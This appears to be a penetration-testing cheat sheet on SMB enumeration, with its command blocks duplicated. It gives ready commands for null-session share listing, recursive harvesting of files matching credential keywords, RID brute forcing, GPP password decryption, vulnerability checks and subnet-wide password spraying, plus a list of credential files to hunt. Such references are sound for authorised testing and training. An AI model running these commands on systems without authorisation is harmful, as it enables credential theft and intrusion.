Enumeration
SMB Enumeration
SMB (Server Message Block) on ports 139/445 is a goldmine for internal enumeration. Extract share permissions, user lists, password policies, and sensitive files.
Information
SMB enumeration often works with null sessions (no credentials) on older systems,
but authenticated enumeration yields significantly more information.
Share Enumeration
Null Session Enumeration
bash
# smbclient - list shares (null session)
smbclient -L //TARGET -N
# smbmap - null session
smbmap -H TARGET
# nxc - null session
nxc smb TARGET -u '' -p '' --shares
# enum4linux-ng - comprehensive null session
enum4linux-ng -A TARGET# smbclient - list shares (null session)
smbclient -L //TARGET -N
# smbmap - null session
smbmap -H TARGET
# nxc - null session
nxc smb TARGET -u '' -p '' --shares
# enum4linux-ng - comprehensive null session
enum4linux-ng -A TARGETAuthenticated Enumeration
bash
# smbclient with credentials
smbclient -L //TARGET -U 'domain/user%password'
# smbmap authenticated
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -d domain
# nxc authenticated
nxc smb TARGET -u user -p password --shares
# enum4linux-ng authenticated
enum4linux-ng -u user -p password -A TARGET# smbclient with credentials
smbclient -L //TARGET -U 'domain/user%password'
# smbmap authenticated
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -d domain
# nxc authenticated
nxc smb TARGET -u user -p password --shares
# enum4linux-ng authenticated
enum4linux-ng -u user -p password -A TARGETConnecting to Shares
bash
# Interactive connection
smbclient //TARGET/share -U 'user%password'
# Useful smbclient commands
smb: \> dir
smb: \> cd directory
smb: \> get filename
smb: \> mget *
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
# Mount share locally
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass,domain=DOMAIN# Interactive connection
smbclient //TARGET/share -U 'user%password'
# Useful smbclient commands
smb: \> dir
smb: \> cd directory
smb: \> get filename
smb: \> mget *
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
# Mount share locally
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass
sudo mount -t cifs //TARGET/share /mnt/share -o user=user,password=pass,domain=DOMAINDeep Share Enumeration
smbmap Deep Dive
bash
# Recursive listing (depth)
smbmap -H TARGET -u user -p pass -r share --depth 5
# Download files matching pattern
smbmap -H TARGET -u user -p pass -R -A '\.(config|xml|txt|ini|bak)$'
# Search for specific filename patterns
smbmap -H TARGET -u user -p pass -R -A 'password|credential|secret'
# List all readable files recursively
smbmap -H TARGET -u user -p pass -R# Recursive listing (depth)
smbmap -H TARGET -u user -p pass -r share --depth 5
# Download files matching pattern
smbmap -H TARGET -u user -p pass -R -A '\.(config|xml|txt|ini|bak)$'
# Search for specific filename patterns
smbmap -H TARGET -u user -p pass -R -A 'password|credential|secret'
# List all readable files recursively
smbmap -H TARGET -u user -p pass -Rnxc Spider
bash
# Spider shares for files
nxc smb TARGET -u user -p pass -M spider_plus
# Spider with specific patterns
nxc smb TARGET -u user -p pass -M spider_plus -o EXCLUDE_DIR=Windows,ProgramData
# Output to JSON for analysis
nxc smb TARGET -u user -p pass -M spider_plus -o OUTPUT=/tmp/spider.json# Spider shares for files
nxc smb TARGET -u user -p pass -M spider_plus
# Spider with specific patterns
nxc smb TARGET -u user -p pass -M spider_plus -o EXCLUDE_DIR=Windows,ProgramData
# Output to JSON for analysis
nxc smb TARGET -u user -p pass -M spider_plus -o OUTPUT=/tmp/spider.jsonUser & Group Enumeration
enum4linux-ng
bash
# Full enumeration
enum4linux-ng -A TARGET
# Users only
enum4linux-ng -U TARGET
# Groups only
enum4linux-ng -G TARGET
# Shares only
enum4linux-ng -S TARGET
# Password policy
enum4linux-ng -P TARGET
# RID cycling (enumerate users via RID brute force)
enum4linux-ng -R TARGET# Full enumeration
enum4linux-ng -A TARGET
# Users only
enum4linux-ng -U TARGET
# Groups only
enum4linux-ng -G TARGET
# Shares only
enum4linux-ng -S TARGET
# Password policy
enum4linux-ng -P TARGET
# RID cycling (enumerate users via RID brute force)
enum4linux-ng -R TARGETrpcclient
bash
# Connect with credentials
rpcclient -U 'user%password' TARGET
# Null session
rpcclient -U '' -N TARGET
# Interactive commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 500
rpcclient $> queryuser administrator
rpcclient $> querygroupmem "Domain Admins"
rpcclient $> getdompwinfo
rpcclient $> lsaenumsid
rpcclient $> lookupnames administrator# Connect with credentials
rpcclient -U 'user%password' TARGET
# Null session
rpcclient -U '' -N TARGET
# Interactive commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser 500
rpcclient $> queryuser administrator
rpcclient $> querygroupmem "Domain Admins"
rpcclient $> getdompwinfo
rpcclient $> lsaenumsid
rpcclient $> lookupnames administratorImpacket Tools
bash
# samrdump - dump SAM info
samrdump.py domain/user:password@TARGET
# lookupsid - enumerate users via SID
lookupsid.py domain/user:password@TARGET
# Brute force RIDs
lookupsid.py domain/user:password@TARGET 20000# samrdump - dump SAM info
samrdump.py domain/user:password@TARGET
# lookupsid - enumerate users via SID
lookupsid.py domain/user:password@TARGET
# Brute force RIDs
lookupsid.py domain/user:password@TARGET 20000Sensitive File Hunting
High-Value Targets
text
# Files to look for:
web.config # ASP.NET config with connection strings
*.config # Various app configs
unattend.xml # Windows deployment answers
sysprep.xml # Sysprep answers (may contain creds)
Groups.xml # GPP passwords (SYSVOL)
*.kdbx # KeePass databases
*.key, *.pem # SSH/SSL keys
id_rsa # SSH private keys
.git/ # Git repositories
.svn/ # SVN repositories
*.bak, *.old # Backup files
passwords.txt # Self-explanatory
credentials.xml # Jenkins credentials
*.sql # Database dumps
*.mdb, *.accdb # Access databases# Files to look for:
web.config # ASP.NET config with connection strings
*.config # Various app configs
unattend.xml # Windows deployment answers
sysprep.xml # Sysprep answers (may contain creds)
Groups.xml # GPP passwords (SYSVOL)
*.kdbx # KeePass databases
*.key, *.pem # SSH/SSL keys
id_rsa # SSH private keys
.git/ # Git repositories
.svn/ # SVN repositories
*.bak, *.old # Backup files
passwords.txt # Self-explanatory
credentials.xml # Jenkins credentials
*.sql # Database dumps
*.mdb, *.accdb # Access databasesGPP Password Extraction
bash
# Check SYSVOL for Groups.xml (GPP passwords)
smbclient //DC/SYSVOL -U 'user%pass' -c 'recurse;ls' | grep -i groups.xml
# Download and decrypt
smbmap -H DC -u user -p pass -R SYSVOL -A Groups.xml
# Decrypt GPP password
gpp-decrypt "encrypted_password_here"
# Automated with nxc
nxc smb DC -u user -p pass -M gpp_password# Check SYSVOL for Groups.xml (GPP passwords)
smbclient //DC/SYSVOL -U 'user%pass' -c 'recurse;ls' | grep -i groups.xml
# Download and decrypt
smbmap -H DC -u user -p pass -R SYSVOL -A Groups.xml
# Decrypt GPP password
gpp-decrypt "encrypted_password_here"
# Automated with nxc
nxc smb DC -u user -p pass -M gpp_passwordSMB Vulnerabilities
SMB Signing Check
bash
# Check SMB signing (required for relay attacks)
nxc smb TARGET --gen-relay-list relay.txt
# Nmap script
nmap -p 445 --script smb-security-mode TARGET
# Output shows:
# message_signing: disabled (vulnerable to relay)
# message_signing: required (not vulnerable)# Check SMB signing (required for relay attacks)
nxc smb TARGET --gen-relay-list relay.txt
# Nmap script
nmap -p 445 --script smb-security-mode TARGET
# Output shows:
# message_signing: disabled (vulnerable to relay)
# message_signing: required (not vulnerable)EternalBlue (MS17-010)
bash
# Check for MS17-010
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# nxc check
nxc smb TARGET -u '' -p '' -M ms17-010# Check for MS17-010
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# nxc check
nxc smb TARGET -u '' -p '' -M ms17-010PrintNightmare Check
bash
# Check if Print Spooler is running
rpcdump.py TARGET | grep -i spooler
# nxc module
nxc smb TARGET -u user -p pass -M printnightmare# Check if Print Spooler is running
rpcdump.py TARGET | grep -i spooler
# nxc module
nxc smb TARGET -u user -p pass -M printnightmareMass SMB Enumeration
bash
# Enumerate entire subnet
nxc smb 10.10.10.0/24 -u user -p pass --shares
# Find writable shares
nxc smb 10.10.10.0/24 -u user -p pass --shares | grep -i write
# Password spray across SMB
nxc smb targets.txt -u users.txt -p 'Password123!' --continue-on-success
# Export results
nxc smb 10.10.10.0/24 -u user -p pass --shares --export shares.json# Enumerate entire subnet
nxc smb 10.10.10.0/24 -u user -p pass --shares
# Find writable shares
nxc smb 10.10.10.0/24 -u user -p pass --shares | grep -i write
# Password spray across SMB
nxc smb targets.txt -u users.txt -p 'Password123!' --continue-on-success
# Export results
nxc smb 10.10.10.0/24 -u user -p pass --shares --export shares.jsonQuick Reference
| Task | Tool | Command |
|---|---|---|
| List shares | smbmap | smbmap -H TARGET -u user -p pass |
| Full enum | enum4linux-ng | enum4linux-ng -A TARGET |
| Spider files | nxc | nxc smb TARGET -M spider_plus |
| GPP passwords | nxc | nxc smb DC -M gpp_password |
| Signing check | nxc | nxc smb TARGET --gen-relay-list |